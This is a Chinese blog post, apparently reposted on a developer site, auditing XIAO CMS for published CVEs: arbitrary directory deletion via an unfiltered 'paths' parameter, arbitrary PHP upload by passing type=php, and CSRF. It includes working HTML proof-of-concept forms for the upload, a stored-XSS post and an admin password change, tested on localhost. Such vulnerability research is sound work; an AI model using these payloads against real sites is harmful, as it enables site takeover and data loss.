XIAO CMS审计

栏目: 编程工具 · 发布时间: 6年前

内容简介:他没有判断referer是从哪里来的,可以随意csrf,举两个例子任意添加一个xss面板改管理员的密码

翻安全客的时候看到xiao cms爆了6个cve审计一下

XIAO CMS审计

任意目录删除

XIAO CMS审计

跟进一下database.php

看到action是import找到那个函数

XIAO CMS审计

可以看到 paths 这个post参数并没有对 ./ 进行过滤,可以进行任意文件删除,而且payload的paths参数应该是post=。=

放一个自己的目录测试一下

XIAO CMS审计

创建了一个 ckj123 的目录,试下能不能删除

XIAO CMS审计 XIAO CMS审计

成功

任意文件上传

XIAO CMS审计

很明显的可以看到uploadfile.php文件

找到上传文件的地方

所有的upload需要一个upload函数

XIAO CMS审计

看到他加载了一个叫做upload的类

然后获得了文件最后的扩展名,判断了是图片还是别的文件

跟进upload

XIAO CMS审计

跟进upload类

XIAO CMS审计

里面有个过滤的地方

XIAO CMS审计 XIAO CMS审计

获得后缀,跟限制的类型进行比较

XIAO CMS审计

可以看到这个type是需要自己传进去的

XIAO CMS审计

总共两个action

下面那个的type是规定死的

发现上面那个的type是需要自己传进去的这就可以传 php 文件了

XIAO CMS审计 
<html>
    <body>
    <form action="http://127.0.0.1:8080/admin/index.php?c=uploadfile&a=uploadify_upload&type=php&size=1000" method="post" enctype="multipart/form-data">
    <input type="file" name="file" />
    <input type="submit" name="submit" value="submit" />
    </form>
</body>
</html>

CVE给的payload不对。。

XIAO CMS审计

成功了,然后连接一下这个马

XIAO CMS审计

CSRF

他没有判断referer是从哪里来的,可以随意csrf,举两个例子

任意添加一个xss面板

<html>
  <body>
    <form action="http://127.0.0.1:8080/admin/index.php?c=content&a=add&catid=3" method="POST">
      <input type="hidden" name="data[catid]" value="3" />
      <input type="hidden" name="data[title]" value="test" />
      <input type="hidden" name="data[thumb]" value="" />
      <input type="hidden" name="data[keywords]" value="" />
      <input type="hidden" name="data[description]" value="" />
      <input type="hidden" name="data[content]" value="<script>alert(1)</script>" />
      <input type="hidden" name="data[xiao_auto_description]" value="1" />
      <input type="hidden" name="data[xiao_auto_thumb]" value="1" />
      <input type="hidden" name="data[xiao_download_image]" value="1" />
      <input type="hidden" name="data[time]" value="2018-11-02+15:05:43" />
      <input type="hidden" name="data[hits]" value="" />
      <input type="hidden" name="submit" value="提交" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

改管理员的密码

<form action="http://127.0.0.1:8080/admin/index.php?c=index&a=my" method="POST">       
<input type="hidden" name="data[password]" value="1234567">
<input type="hidden" name="submit" value="提交" />
<input type="submit" value="Submit request" />
</form>

后记

xss的漏洞没看,以后有空补上


以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

码农书籍
永无止境

永无止境

[美] 道格拉斯•艾德华兹 / 刘纯毅 / 中信出版社 / 2012-12-15 / 59.00元

★ 值得中国初创公司反复思考的企业传记 ★ 互联网行业必读书 ★ Google高管揭开Google的神秘面纱 ★ 探寻“G力量”重塑人类知识景观的心路历程 ★ Google走过的路,Google未来的路 ★ 编辑推荐: 它是目前被公认为全球最大的搜索引擎!它是互联网上五大最受欢迎的网站之一! 它在操作界面中提供多达30余种语言选择,在全球范围内拥有无数用户......一起来看看 《永无止境》 这本书的介绍吧!

码农工具
HTML 压缩/解压工具
HTML 压缩/解压工具

在线压缩/解压 HTML 代码

JS 压缩/解压工具
JS 压缩/解压工具

在线压缩/解压 JS 代码

图片转BASE64编码
图片转BASE64编码

在线图片转Base64编码工具

  • New
  • 文章
  • 话题
  • 教程
    • 关注 码农网 公众号
    版权所有,保留一切权利!© 2018-2025 码农网 粤ICP备17054400号-3